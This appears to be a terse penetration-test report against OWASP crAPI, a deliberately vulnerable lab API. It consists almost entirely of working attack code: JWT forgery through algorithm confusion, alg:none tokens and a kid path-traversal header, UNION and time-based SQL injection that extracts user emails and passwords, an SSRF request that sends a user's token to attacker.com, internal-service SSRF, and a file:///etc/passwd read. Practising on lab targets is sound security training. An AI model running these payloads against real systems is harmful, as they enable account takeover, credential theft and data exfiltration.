OWASP crAPI report

import jwt
import requests

# Extract RS256 public key from server
public_key = requests.get('http://crapi.local/jwks.json').json()['keys'][0]

# Forge token using public key as HMAC secret
forged_token = jwt.encode(
    {'user_id': 1, 'role': 'admin'},
    public_key,
    algorithm='HS256'
)

# Create unsigned JWT with alg:none
TOKEN=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 -w0).\
$(echo -n '{"user_id":1,"role":"admin"}' | base64 -w0).

curl http://crapi.local/api/admin/users \
  -H "Authorization: Bearer $TOKEN"

{
  "alg": "HS256",
  "kid": "../../dev/null"
}

# Extract user credentials
curl "http://crapi.local/api/shop/orders?search=x'%20UNION%20SELECT%20id,email,password,null,null%20FROM%20users--"

# Extract database schema
curl "http://crapi.local/api/shop/orders?search=x'%20UNION%20SELECT%20table_name,column_name,null,null,null%20FROM%20information_schema.columns--"

# Confirm injection with sleep
curl "http://crapi.local/api/mechanic/vehicle/ABC123'%20AND%20pg_sleep(5)--"
# Response delayed 5 seconds

# Exfiltrate data bit by bit
curl "http://crapi.local/api/mechanic/vehicle/ABC123'%20AND%20substring(password,1,1)='a'--"

# Exfiltrate user's JWT to attacker server
curl -X POST http://crapi.local/api/share/report \
  -H "Authorization: Bearer $USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"report_url":"http://attacker.com/collect"}'

# Access internal services
curl -X POST http://crapi.local/api/user/picture \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"picture_url":"http://internal-api:8080/admin"}'

# File protocol for local file read
curl -X POST http://crapi.local/api/user/picture \
  -d '{"picture_url":"file:///etc/passwd"}'